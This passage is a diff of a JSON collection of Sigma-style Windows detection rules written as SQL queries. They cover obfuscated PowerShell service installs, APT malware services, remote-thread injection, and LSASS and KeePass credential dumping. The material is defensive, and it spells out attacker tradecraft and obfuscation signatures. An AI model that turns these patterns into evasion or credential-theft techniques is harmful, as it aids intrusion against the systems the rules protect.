"Detects when an attacker registers a new AMSI provider in order to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate security products adding their own AMSI providers. Filter these according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "registry_add_persistence_amsi_providers.yml" + "filename": "win_system_invoke_obfuscation_via_var_services.yml" }, { - "title": "Potential Persistence Via Logon Scripts - Registry", - "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", - "status": "test", - "description": "Detects creation of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "title": "Suspicious Service Installation Script", + "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", + "status": "experimental", + "description": "Detects suspicious service installation scripts", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1037.001", "attack.persistence", - "attack.lateral_movement" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" ], - "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" + "filename": "win_system_susp_service_installation_script.yml" }, { - "title": "Potential Ursnif Malware Activity - Registry", - "id": "21f17060-b282-4249-ade0-589ea3591558", - "status": "test", - "description": "Detects registry keys related to Ursnif malware.", - "author": "megan201296", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", + "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.execution", - "attack.t1112" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "registry_add_malware_ursnif.yml" + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" }, { - "title": "Sysmon Configuration Modification", - "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", - "status": "test", - "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", - "author": "frack113", + "title": "Invoke-Obfuscation Via Use Rundll32 - System", + "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1564" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative action" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('4', '16') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "sysmon_config_modification_status.yml" + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" }, { - "title": "Sysmon Blocked Executable", - "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", - "status": "experimental", - "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "StoneDrill Service Install", + "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "status": "test", + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.g0064", + "attack.t1543.003" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '27' AND Channel = 'Microsoft-Windows-Sysmon/Operational')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" ], - "filename": "sysmon_file_block_exe.yml" + "filename": "win_system_apt_stonedrill.yml" }, { - "title": "Sysmon Process Hollowing Detection", - "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "title": "KrbRelayUp Service Installation", + "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "status": "experimental", - "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "author": "Sittikorn S, Tim Shelton", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055.012" - ], - "falsepositives": [ - "There are no known false positives at this time" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '25' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Type = 'Image is replaced' AND NOT ((Image LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" - ], - "filename": "sysmon_process_hollowing.yml" - }, - { - "title": "Sysmon Configuration Error", - "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", - "status": "experimental", - "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.t1543" ], "falsepositives": [ - "Legitimate administrative action" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '255' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" ], - "filename": "sysmon_config_modification_error.yml" + "filename": "win_system_krbrelayup_service_installation.yml" }, { - "title": "CobaltStrike Process Injection", - "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "title": "Turla Service Install", + "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", "status": "test", - "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", - "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.persistence", + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" ], - "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" + "filename": "win_system_apt_carbonpaper_turla.yml" }, { - "title": "CreateRemoteThread API and LoadLibrary", - "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", - "status": "test", - "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Invoke-Obfuscation VAR+ Launcher - System", + "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1055.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "create_remote_thread_win_loadlibrary.yml" + "filename": "win_system_invoke_obfuscation_var_services.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", - "id": "fb656378-f909-47c1-8747-278bf09f4f4f", + "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", + "id": "52a85084-6989-40c3-8f32-091e12e17692", "status": "experimental", - "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation. Viewed on 2008 Server", + "author": "Cybex", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" ], - "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" }, { - "title": "Remote Thread Creation in Suspicious Targets", - "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", - "status": "experimental", - "description": "Detects a remote thread creation in suspicious target images", - "author": "Florian Roth (Nextron Systems)", + "title": "Atera Agent Installation", + "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "status": "test", + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.003" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate Atera agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_targets.yml" + "filename": "win_software_atera_rmm_agent_install.yml" }, { - "title": "KeePass Password Dumping", - "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", + "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", "status": "experimental", - "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", - "author": "Timon Hackenjos", + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.005" + "attack.initial_access", + "attack.t1190" ], "falsepositives": [ - "Unknown" + "Other MSI packages for which your admins have used that name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_keepass.yml" + "filename": "win_vul_cve_2021_41379.yml" }, { - "title": "Bumblebee Remote Thread Creation", - "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "title": "Microsoft Malware Protection Engine Crash - WER", + "id": "6c82cf5c-090d-4d57-9188-533577631108", "status": "experimental", - "description": "Detects remote thread injection events based on action seen used by bumblebee", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Windows Error Reporting' AND EventID = '1001' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_bumblebee.yml" + "filename": "win_application_msmpeng_crash_wer.yml" }, { - "title": "Password Dumper Remote Thread in LSASS", - "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", - "status": "stable", - "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", - "author": "Thomas Patzke", + "title": "Audit CVE Event", + "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "status": "experimental", + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "author": "Florian Roth (Nextron Systems), Zach Mathis", "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", + "attack.defense_evasion", + "attack.t1211", "attack.credential_access", - "attack.s0005", - "attack.t1003.001" + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" ], "falsepositives": [ - "Antivirus products" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" ], - "filename": "create_remote_thread_win_password_dumper_lsass.yml" + "filename": "win_audit_cve.yml" }, { - "title": "Remote Thread Creation Ttdinject.exe Proxy", - "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "title": "Microsoft Malware Protection Engine Crash", + "id": "545a5da6-f103-4919-a519-e9aec1026ee4", "status": "experimental", - "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", - "author": "frack113", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_ttdinjec.yml" + "filename": "win_application_msmpeng_crash_error.yml" }, { - "title": "Suspicious Remote Thread Source", - "id": "66d31e5f-52d6-40a4-9615-002d3789a119", + "title": "Potential Credential Dumping Via WER - Application", + "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "author": "Perez Diego (@darkquassar), oscd.community", + "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1055" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate crashing of the lsass process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" ], - "filename": "create_remote_thread_win_susp_remote_thread_source.yml" + "filename": "win_werfault_susp_lsass_credential_dump.yml" }, { - "title": "Accessing WinAPI in PowerShell. Code Injection", - "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", - "status": "test", - "description": "Detects the creation of a remote thread from a Powershell process to another process", - "author": "Nikita Nazarov, oscd.community", + "title": "Restricted Software Access By SRP", + "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "status": "experimental", + "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" ], - "filename": "create_remote_thread_win_powershell_code_injection.yml" + 